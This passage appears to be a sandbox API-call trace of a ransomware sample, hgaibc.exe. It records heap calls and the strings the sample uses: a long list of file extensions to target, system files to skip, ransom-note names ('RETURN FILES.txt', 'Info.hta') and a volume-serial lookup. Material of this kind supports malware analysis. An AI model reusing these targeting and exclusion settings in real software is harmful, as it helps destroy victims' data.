(HeapHandle=0x5d0000, Flags=0x0, Size=0x8) returned 0x6131d0 [0043.299] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x639788 [0043.299] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xa) returned 0x6397d0 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x800) returned 0x639f48 [0043.299] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0043.299] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x627720 | out: hHeap=0x5d0000) returned 1 [0043.299] lstrlenW (lpString="") returned 0 [0043.299] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63aac8 | out: hHeap=0x5d0000) returned 1 [0043.299] lstrlenW (lpString=".bat") returned 4 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613180, Size=0x8) returned 0x613480 [0043.299] lstrlenW (lpString=".bat") returned 4 [0043.299] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63ac90 | out: hHeap=0x5d0000) returned 1 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63acf0, Size=0x20) returned 0x60ec28 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec28, Size=0x40) returned 0x5ea618 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea618, Size=0x80) returned 0x614380 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613180, Size=0x8) returned 0x613520 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613520, Size=0x10) returned 0x63ad20 [0043.299] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ad20, Size=0x20) returned 0x60e890 [0043.300] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0043.300] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614380 | out: hHeap=0x5d0000) returned 1 [0043.300] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ad20, Size=0x20) returned 0x60e7c8 [0043.300] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e7c8, Size=0x40) returned 0x5ea468 [0043.300] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0043.300] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0043.300] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea468 | out: hHeap=0x5d0000) returned 1 [0043.300] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ab58, Size=0x20) returned 0x60e958 [0043.300] lstrlenW (lpString="Info.hta") returned 8 [0043.300] lstrlenW (lpString="Info.hta") returned 8 [0043.300] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e958 | out: hHeap=0x5d0000) returned 1 [0043.300] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x63af58, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe")) returned 0x22 [0043.300] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63af58 | out: hHeap=0x5d0000) returned 1 [0043.301] lstrlenW (lpString="hgaibc.exe") returned 10 [0043.301] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e890, Size=0x40) returned 0x5ea540 [0043.301] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ab28, Size=0x20) returned 0x60e840 [0043.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ab70, Size=0x20) returned 0x60ea70 [0043.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ea70, Size=0x40) returned 0x5e9fa0 [0043.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e9fa0, Size=0x80) returned 0x6141e8 [0043.302] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6141e8, Size=0x100) returned 0x615fd0 [0043.302] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0043.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.302] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x63af58, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0043.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64af60 | out: hHeap=0x5d0000) returned 1 [0043.302] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63af58 | out: hHeap=0x5d0000) returned 1 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613410, Size=0x8) returned 0x613490 [0043.303] lstrlenW (lpString="%windir%;") returned 9 [0043.303] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e840 | out: hHeap=0x5d0000) returned 1 [0043.303] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0043.303] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x628728 | out: hHeap=0x5d0000) returned 1 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ac30, Size=0x20) returned 0x60eac0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60eac0, Size=0x40) returned 0x5ea618 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea618, Size=0x80) returned 0x6146b0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6146b0, Size=0x100) returned 0x615fd0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6134e0, Size=0x8) returned 0x613500 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613500, Size=0x10) returned 0x63ab88 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ab88, Size=0x20) returned 0x60e818 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6134c0, Size=0x8) returned 0x6134a0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6134f0, Size=0x8) returned 0x613430 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613420, Size=0x8) returned 0x613520 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613520, Size=0x10) returned 0x63ab88 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63ab88, Size=0x20) returned 0x60eac0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6134a0, Size=0x10) returned 0x63aae0 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613430, Size=0x10) returned 0x63aa98 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613380, Size=0x8) returned 0x613450 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6134f0, Size=0x8) returned 0x613430 [0043.303] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63aae0, Size=0x20) returned 0x60e7a0 [0043.304] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63aa98, Size=0x20) returned 0x60e958 [0043.304] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613460, Size=0x8) returned 0x613400 [0043.304] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0043.304] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.304] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63abd0, Size=0x20) returned 0x60e980 [0043.304] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x627720, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0043.304] lstrlenW (lpString="C:\\") returned 3 [0043.304] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0043.304] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x627720 | out: hHeap=0x5d0000) returned 1 [0043.304] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6133c0, Size=0x82) returned 0x616060 [0043.305] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613410, Size=0x100) returned 0x6160f0 [0043.305] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x616060, Size=0x104) returned 0x616318 [0043.305] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6160f0, Size=0x200) returned 0x627720 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x613500 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x627720 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63aea0 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614f30 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63ad80 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614050 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63af18 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616318 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63af30 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6161f8 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63ae88 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616288 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63aee8 | out: hHeap=0x5d0000) returned 1 [0043.306] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63aee8, Size=0x20) returned 0x60e9a8 [0043.306] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e9a8, Size=0x40) returned 0x5ea150 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6133a0 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63abd0 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63adc8 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614380 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63adf8 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x613460 | out: hHeap=0x5d0000) returned 1 [0043.306] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63ae70 | out: hHeap=0x5d0000) returned 1 [0043.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6138 | out: hHeap=0x5d0000) returned 1 [0043.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e50f0 | out: hHeap=0x5d0000) returned 1 [0043.307] lstrlenW (lpString="%systemdrive%") returned 13 [0043.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e980 | out: hHeap=0x5d0000) returned 1 [0043.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614ea8 | out: hHeap=0x5d0000) returned 1 [0043.307] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6134f0 | out: hHeap=0x5d0000) returned 1 [0043.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x617700, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x260 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63adf8, Size=0x20) returned 0x60ec00 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec00, Size=0x40) returned 0x5ea6f0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea6f0, Size=0x80) returned 0x614160 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614160, Size=0x100) returned 0x615fd0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x200) returned 0x615fd0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x400) returned 0x615fd0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x800) returned 0x629728 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x629728, Size=0x1000) returned 0x629728 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6133e0, Size=0x8) returned 0x613460 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x613460, Size=0x10) returned 0x63af30 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x63af30, Size=0x20) returned 0x60ec00 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec00, Size=0x40) returned 0x5ea588 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea588, Size=0x80) returned 0x614d10 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614d10, Size=0x100) returned 0x615fd0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x200) returned 0x615fd0 [0043.308] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x400) returned 0x615fd0 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615fd0, Size=0x800) returned 0x65d398 [0043.309] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776 [0043.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x629728 | out: hHeap=0x5d0000) returned 1 [0043.309] lstrlenW (lpString="") returned 0 [0043.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65bfe0 | out: hHeap=0x5d0000) returned 1 [0043.309] lstrlenW (lpString=".bat") returned 4 [0043.309] lstrlenW (lpString=".bat") returned 4 [0043.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65c058 | out: hHeap=0x5d0000) returned 1 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c058, Size=0x20) returned 0x60e980 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e980, Size=0x40) returned 0x5ea390 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea390, Size=0x80) returned 0x614518 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d040, Size=0x8) returned 0x65cfc0 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65cfc0, Size=0x10) returned 0x65c058 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c058, Size=0x20) returned 0x60eb10 [0043.309] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48 [0043.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614518 | out: hHeap=0x5d0000) returned 1 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c3b8, Size=0x20) returned 0x60e7f0 [0043.309] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e7f0, Size=0x40) returned 0x5ea6f0 [0043.309] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0043.309] lstrlenW (lpString="RETURN FILES.txt") returned 16 [0043.309] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea6f0 | out: hHeap=0x5d0000) returned 1 [0043.310] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c550, Size=0x20) returned 0x60eb38 [0043.310] lstrlenW (lpString="Info.hta") returned 8 [0043.310] lstrlenW (lpString="Info.hta") returned 8 [0043.310] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60eb38 | out: hHeap=0x5d0000) returned 1 [0043.310] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x65dba0, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe")) returned 0x22 [0043.310] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65dba0 | out: hHeap=0x5d0000) returned 1 [0043.310] lstrlenW (lpString="hgaibc.exe") returned 10 [0043.310] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60eb10, Size=0x40) returned 0x5ea468 [0043.310] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c508, Size=0x20) returned 0x60e7f0 [0043.311] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c430, Size=0x20) returned 0x60e840 [0043.311] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e840, Size=0x40) returned 0x5ea588 [0043.311] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea588, Size=0x80) returned 0x614b78 [0043.311] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614b78, Size=0x100) returned 0x615fd0 [0043.311] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0043.311] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615fd0 | out: hHeap=0x5d0000) returned 1 [0043.311] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x65dba0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0043.311] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x66dba8 | out: hHeap=0x5d0000) returned 1 [0043.312] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x65dba0 | out: hHeap=0x5d0000) returned 1 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d0c0, Size=0x8) returned 0x65d140 [0043.313] lstrlenW (lpString="%windir%;") returned 9 [0043.313] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7f0 | out: hHeap=0x5d0000) returned 1 [0043.313] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0043.313] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x64af78 | out: hHeap=0x5d0000) returned 1 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c580, Size=0x20) returned 0x60ec00 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ec00, Size=0x40) returned 0x5ea198 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea198, Size=0x80) returned 0x614518 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614518, Size=0x100) returned 0x615fd0 [0043.313] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d040, Size=0x8) returned 0x65d1a0 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d1a0, Size=0x10) returned 0x65c4a8 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c4a8, Size=0x20) returned 0x60e980 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d150, Size=0x8) returned 0x65d110 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d180, Size=0x8) returned 0x65d040 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d0e0, Size=0x8) returned 0x65d050 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d050, Size=0x10) returned 0x65c3e8 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c3e8, Size=0x20) returned 0x60ea70 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d110, Size=0x10) returned 0x65c4a8 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d040, Size=0x10) returned 0x65c538 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d120, Size=0x8) returned 0x65d150 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d0f0, Size=0x8) returned 0x65d060 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c4a8, Size=0x20) returned 0x60e9a8 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65c538, Size=0x20) returned 0x60ec28 [0043.314] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x65d0c0, Size=0x8) returned 0x65d100 [0043.314] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0043.314] HeapFree (in: hHeap=0x5d0000, 